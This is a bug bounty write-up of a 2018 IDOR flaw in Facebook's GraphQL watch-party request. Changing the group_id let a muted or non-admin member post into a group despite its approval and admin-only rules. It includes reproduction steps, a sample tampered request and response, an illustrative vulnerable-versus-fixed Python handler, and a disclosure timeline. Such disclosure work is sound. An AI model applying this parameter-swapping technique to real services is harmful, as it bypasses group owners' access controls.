Bypass Admin approval, Mute Member and Posting Permissions for Only admins in Facebook groups

Introduction

While reviewing my old notes on my computer, I came across the following entry:

  • To check “Watch Party Option”

So, what exactly is the Watch Party Option?

The Watch Party Option is an innovative feature within Facebook groups that empowers not only Group admins but also regular members to select any public video on Facebook and present it simultaneously to other group members. This feature enhances the communal viewing experience by allowing members to collectively watch and engage with the chosen video. For more detailed insights into how this feature works, refer to the following link: https://globaldatinginsights.com/2018/05/02/facebook-watch-party-allows-groups-watch-videos-simultaneously

The finding

During the testing of the Watch Party functionality in Facebook groups, an Insecure Direct Object Reference (IDOR) vulnerability was identified within the “graphql” endpoint. This bug allows attackers to bypass:

  • Posting admin approval.
  • Muting a member.
  • Posting permissions restricted to admins.


Reproduction Steps

Step 1 – Victim Perspective:

  • Navigate to the group settings you own.
  • Verify the settings:
    • Post Approval: All group posts must be approved by an admin or a moderator.
    • Posting Permissions: Only admin.

Step 2 – Victim Perspective:

  • Access the group member options and mute the “Attacker” to prevent any posts in the group.

Step 3 – Attacker Perspective:

  • Go to your group.
  • Create a watch party and intercept the request. The request structure is as follows:
POST /api/graphql/ HTTP/1.1
variables={"input":{"client_mutation_id":"2","actor_id":"userID","composer_session_id":"SESSIONID","creator_actor_id":"actorID","custom_name":null,"group_id":"AttackerGroupID","video_ids":["VIDEO-ID"]}}&doc_id=doc-id

Step 4 – Attacker Perspective:

  • Change the value of “group_id”: “AttackerGroupID” to the victim group ID and forward the request. The response will be similar to:
{
  "data": {
    "group_living_room_create": {
      "client_mutation_id": "2",
      "living_room": {
        "__typename": "LivingRoomSession",
        "id": "199255894011111"
      }
    }
  }
}

where “id”: “199255894011111” is the LivingRoomSession ID.
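The missing server-side check, as an added illustration that is not Facebook's code: a constructed Python handler for the group_living_room_create mutation in its flawed form beside a hardened one that takes the actor from the authenticated session and enforces membership, mute status, posting permissions and post approval against the target group_id. The Group class, the group names and the rule fields are assumptions made for the example.

```python
import json
from dataclasses import dataclass, field

# Constructed group state standing in for the two groups in the report (hypothetical data).
@dataclass
class Group:
    admins: set
    members: set
    muted: set = field(default_factory=set)
    admins_only_posting: bool = False
    post_approval_required: bool = False

GROUPS = {
    "AttackerGroupID": Group(admins={"attacker"}, members={"attacker"}),
    "VictimGroupID": Group(admins={"victim"}, members={"victim", "attacker", "member"},
                           muted={"attacker"}, admins_only_posting=True,
                           post_approval_required=True),
}

def create_living_room_vulnerable(variables: str) -> dict:
    """Flawed behaviour: group_id and actor_id are taken from the request body and the
    actor's rights in that group are never checked, so a muted or non-admin member can
    still publish a watch party there."""
    inp = json.loads(variables)["input"]
    group_id = inp["group_id"]
    if group_id not in GROUPS:
        return {"error": "no_such_group"}
    return {"status": "published", "group_id": group_id, "actor_id": inp["actor_id"]}

def create_living_room_fixed(session_user: str, variables: str) -> dict:
    """Hardened handler: the actor comes from the session (the body's actor_id is
    ignored) and every group-level rule is evaluated against the supplied group_id."""
    inp = json.loads(variables)["input"]
    group = GROUPS.get(inp["group_id"])
    if group is None or session_user not in group.members:
        return {"error": "not_a_member"}
    if session_user in group.muted:
        return {"error": "muted"}
    is_admin = session_user in group.admins
    if group.admins_only_posting and not is_admin:
        return {"error": "posting_restricted_to_admins"}
    status = "pending_approval" if (group.post_approval_required and not is_admin) else "published"
    return {"status": status, "group_id": inp["group_id"], "actor_id": session_user}

# Constructed request body modelled on Step 4: group_id swapped to the victim's group.
TAMPERED = json.dumps({"input": {"client_mutation_id": "2", "actor_id": "attacker",
                                 "group_id": "VictimGroupID", "video_ids": ["VIDEO-ID"]}})
```

Calling create_living_room_vulnerable(TAMPERED) publishes into the victim's group, whereas create_living_room_fixed("attacker", TAMPERED) refuses because the session user is muted there.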

Step 5 – Attacker Perspective:

Timeline

Sarmad | 03 Jun 2018

  • Initial Report

Meta Bug Bounty | 14 Jun 2018

  • Report Triaged

Meta Bug Bounty | 27 Jun 2018

  • Fixed the first two impacts

Meta Bug Bounty | 17 Jul 2018

  • Complete Fix

Sarmad | 18 Jul 2018

  • Fix Confirmed

Meta Bug Bounty | 18 Jul 2018

  • Bounty Awarded

POC
